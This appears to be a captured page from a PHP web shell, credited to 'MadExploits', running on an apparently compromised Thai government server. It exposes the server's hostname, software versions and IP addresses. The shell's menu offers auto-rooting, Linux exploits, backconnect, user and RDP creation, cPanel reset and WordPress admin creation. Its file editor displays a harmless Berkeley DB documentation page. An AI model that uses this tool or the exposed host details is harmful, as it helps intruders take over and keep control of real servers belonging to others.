Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
db4-devel-4.7.25 /
ref /
arch /
[ HOME SHELL ]
Name
Size
Permission
Action
apis.html
4.74
KB
-rw-r--r--
bigpic.gif
2.53
KB
-rw-r--r--
bigpic.html
6.79
KB
-rw-r--r--
progmodel.html
2.76
KB
-rw-r--r--
script.html
1.97
KB
-rw-r--r--
smallpic.gif
1.58
KB
-rw-r--r--
utilities.html
5.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : utilities.html
<!--$Id: utilities.so,v 10.25 2001/03/05 19:15:07 bostic Exp $--> <!--Copyright (c) 1997,2008 Oracle. All rights reserved.--> <!--See the file LICENSE for redistribution information.--> <html> <head> <title>Berkeley DB Reference Guide: Supporting utilities</title> <meta name="description" content="Berkeley DB: An embedded database programmatic toolkit."> <meta name="keywords" content="embedded,database,programmatic,toolkit,btree,hash,hashing,transaction,transactions,locking,logging,access method,access methods,Java,C,C++"> </head> <body bgcolor=white> <a name="2"><!--meow--></a> <table width="100%"><tr valign=top> <td><b><dl><dt>Berkeley DB Reference Guide:<dd>Architecture</dl></b></td> <td align=right><a href="../arch/script.html"><img src="../../images/prev.gif" alt="Prev"></a><a href="../toc.html"><img src="../../images/ref.gif" alt="Ref"></a><a href="../env/intro.html"><img src="../../images/next.gif" alt="Next"></a> </td></tr></table> <p align=center><b>Supporting utilities</b></p> <p>The following are the standalone utilities that provide supporting functionality for the Berkeley DB environment:</p> <br> <b><a href="../../utility/berkeley_db_svc.html">berkeley_db_svc</a></b><ul compact><li>The <a href="../../utility/berkeley_db_svc.html">berkeley_db_svc</a> utility is the Berkeley DB RPC server that provides standard server functionality for client applications.</ul> <b><a href="../../utility/db_archive.html">db_archive</a></b><ul compact><li>The <a href="../../utility/db_archive.html">db_archive</a> utility supports database backup and archival, and log file administration. It facilitates log reclamation and the creation of database snapshots. Generally, some form of log archival must be done if a database environment has been configured for logging or transactions.</ul> <b><a href="../../utility/db_checkpoint.html">db_checkpoint</a></b><ul compact><li>The <a href="../../utility/db_checkpoint.html">db_checkpoint</a> utility runs as a daemon process, monitoring the database log and periodically issuing checkpoints. It facilitates log reclamation and the creation of database snapshots. Generally, some form of database checkpointing must be done if a database environment has been configured for transactions.</ul> <b><a href="../../utility/db_deadlock.html">db_deadlock</a></b><ul compact><li>The <a href="../../utility/db_deadlock.html">db_deadlock</a> utility runs as a daemon process, periodically traversing the database lock structures and aborting transactions when it detects a deadlock. Generally, some form of deadlock detection must be done if a database environment has been configured for locking.</ul> <b><a href="../../utility/db_dump.html">db_dump</a></b><ul compact><li>The <a href="../../utility/db_dump.html">db_dump</a> utility writes a copy of the database to a flat-text file in a portable format.</ul> <b><a href="../../utility/db_load.html">db_load</a></b><ul compact><li>The <a href="../../utility/db_load.html">db_load</a> utility reads the flat-text file produced by <a href="../../utility/db_dump.html">db_dump</a> and loads it into a database file.</ul> <b><a href="../../utility/db_printlog.html">db_printlog</a></b><ul compact><li>The <a href="../../utility/db_printlog.html">db_printlog</a> utility displays the contents of Berkeley DB log files in a human-readable and parsable format.</ul> <b><a href="../../utility/db_recover.html">db_recover</a></b><ul compact><li>The <a href="../../utility/db_recover.html">db_recover</a> utility runs after an unexpected Berkeley DB or system failure to restore the database to a consistent state. Generally, some form of database recovery must be done if databases are being modified.</ul> <b><a href="../../utility/db_stat.html">db_stat</a> </b><ul compact><li>The <a href="../../utility/db_stat.html">db_stat</a> utility displays statistics for databases and database environments.</ul> <b><a href="../../utility/db_upgrade.html">db_upgrade</a></b><ul compact><li>The <a href="../../utility/db_upgrade.html">db_upgrade</a> utility provides a command-line interface for upgrading underlying database formats.</ul> <b><a href="../../utility/db_verify.html">db_verify</a></b><ul compact><li>The <a href="../../utility/db_verify.html">db_verify</a> utility provides a command-line interface for verifying the database format.</ul> <br> <p>All of the functionality implemented for these utilities is also available as part of the standard Berkeley DB API. This means that threaded applications can easily create a thread that calls the same Berkeley DB functions as do the utilities. This often simplifies an application environment by removing the necessity for multiple processes to negotiate database and database environment creation and shut down.</p> <table width="100%"><tr><td><br></td><td align=right><a href="../arch/script.html"><img src="../../images/prev.gif" alt="Prev"></a><a href="../toc.html"><img src="../../images/ref.gif" alt="Ref"></a><a href="../env/intro.html"><img src="../../images/next.gif" alt="Next"></a> </td></tr></table> <p><font size=1>Copyright (c) 1996,2008 Oracle. All rights reserved.</font> </body> </html>
Close